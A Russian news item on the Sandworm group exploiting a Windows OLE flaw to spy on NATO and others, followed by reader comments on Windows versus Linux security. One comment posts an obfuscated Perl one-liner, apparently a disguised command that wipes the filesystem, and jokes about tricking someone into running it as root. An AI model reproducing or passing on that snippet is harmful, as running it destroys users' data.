Натовские военные не в состоянии хранить секреты из-за дыр в Windows

Специалисты по компьютерной безопасности из компании ISight Partners раскрыли данные, согласно которым российские хакеры в течении 5 лет имели доступ к секретным документам НАТО.

Взлом и несанкционированный доступ к данным осуществлялся через дыру в OLE package manager. Этой уязвимости были подвержены настольные версии Windows: от Vista SP2 до Windows 8.1 и серверные: от Windows Server 2008 до 2012. Через эту дыру хакеры имели возможность незаметно нагружать на атакуемые компьютеры документы в формате PowerPoint, а потом, используя методы социальной инженерии, вынуждали владельцев компьютеров открыть презентацию. При открытии файла PowerPoint эксплуатировалась уже вторая уязвимость — в Microsoft Office — и злоумышленник получал возможность выполнять на атакуемом компьютере произвольный код.

Установлено, что через данную схему российские хакеры 5 лет похищали секретные материалы их следующих организаций:

  • НАТО;
  • правительственные организации Украины;
  • организации Европейского союза;
  • польские энергокомпании;
  • американские научные организации;
  • и т.д.

Хакерскую группировку специалисты из ISight Partners назвали Sandworm. Из-за того, что часть перехваченных у хакеров файлов содержали отсылки к художественному произведению «Дюна» Фрэнка Герберта.

Следует отметить, что никаких конкретных доказательств того, что хакеры были россиянами не предоставлено.

Комментарии

Ни за что не поверю, что НАТО пользовалась Microsoft Windows и Microsoft Office.

А я поверю. У НАТО много всяких бюрократических контор и представительств. Запросто могут использовать Windows, ну а что же еще? Вот всякие командные центры наверное что-то отличное от Вантуза используют.

Но не на Windows-компьютере же секретные документы хранить! Хотя... хрен его знает.

Через эту дыру хакеры имели возможность незаметно нагружать на атакуемые компьютеры документы в формате PowerPoint, а потом, используя методы социальной инженерии, вынуждали владельцев компьютеров открыть презентацию.

И в линуксе бы на ура сработало. Подобные дела тот же Кевин Митник ещё в 80х кучу раз проделывал: звонил на телефон жертвы, представлялся начальником или программистом и приказывал сказать свои логин с паролем, а то в систему войти невозможно.

Нефига подобного, ибо "несанкционированный доступ к данным осуществлялся через дыру в OLE package manager". То есть, линуксоида можно заставить открыть презентацию, но срань из нее не перекинется в систему. По двум причинам: во-первых, в Линуксе отсутствуют изначально ублюдочные механизмы типа OLE. Во-вторых, среди виндузятников ⅔ сидят под администратором, тогда как открыть презентацию под root в Linux мало кому придет в голову.

OLE не ублюдочный, вот DDE как вспомню так вздрогну. А про открытие под рутом можно жертве и подсказать. Через sudo хотя бы, или хитрой строчкой на bash/perl/ещё чём.

Почему не ублюдочный? Юзера ставят в такие условия, что в обычном текстовом документе может быть встроен исполняемый код, чего юзер не ожидает. Собственно, атака и стала возможной именно потому, что благодаря OLE в презентацию встроили исполняемый код. OLE — изначально ублюдочная технология в плане безопасности. Это же как макросы (помните макровирусы?), только больше еще возможностей для вирусописателей.

Почему не ублюдочный?

Если чего-то в линуксе нет — это не значит что оно ублюдочное.

Юзера ставят в такие условия, что в обычном текстовом документе может быть встроен исполняемый код, чего юзер не ожидает.

#/bin/perl
$? ? s:;s:s;;$?: : s;;=]=>%-{<-|}<&|`{; ;
y; -/:-@[-`{-};`-{/" -; ;
s;;$_;see
Обычный текст, правда? Можно спокойно сохранить в текстовом файле и ничего тебе за это не будет. Пока добрый человек не посоветует на него chmod 100 сделать, а потом от рута запустить.

Обычный текст, правда?

Нет, не правда. На файле будет либо стоять флаг исполняемости, либо его можно будет явно запустить, указав perl <имя файла>. В любом случае, юзер не запустит исполнение случайно. А вот самоисполняемый при открытии код в презентации — это полный п...ц! Из-за обилия в Виндузе говнотехнологий типа OLE вирусы там и кишат, тогда как в Linux их нет.

Про случайный запуск речи не было. Речь была о том, что эксплойт пользователей заставляли запускать методом социальной инженерии. И в линуксе это произошло бы ничуть не хуже: делаем документ в каком-нибудь либрофисе, вставляем туда макрос (вроде они на питоне пишутся), который творит нехорошее через любую из множества линуксовых дырок: хоть HeartBleed, хоть ShellShock, хоть ещё какую. Звоним ему на телефон, представляемся начальником, приказываем посмотреть презентацию. Всё. Ну или на мыло высылаем, обозвав как-нибудь вроде "срочно перепроверь и отдай в налоговую".

Вы такого бреда понаписали=)
Дайте пожалуйста хоть один вирус в офисном формате(odg,ods,doc,docx,odt,ppt и т.д.) который бы при открытии в ОС Линукс сработал бы.

А так да можно вообще не изгаляться, зачем писать вирусы то когда можно человека убедить просто поставить штатную программу и дать злоумышленнику полный доступ. =))) Такими вирусами репозитории дистрибутивов Линукс просто кишат.

Комментировать

Filtered HTML

  • Доступны HTML теги: <a> <em> <strong> <cite> <code> <ul> <ol> <li> <dl> <dt> <dd> <blockquote> <strike> <code> <h2> <h3> <h4> <h5> <del> <img>
  • Адреса страниц и электронной почты автоматически преобразуются в ссылки.
  • Строки и параграфы переносятся автоматически.

Plain text

  • HTML-теги не обрабатываются и показываются как обычный текст
  • Адреса страниц и электронной почты автоматически преобразуются в ссылки.
  • Строки и параграфы переносятся автоматически.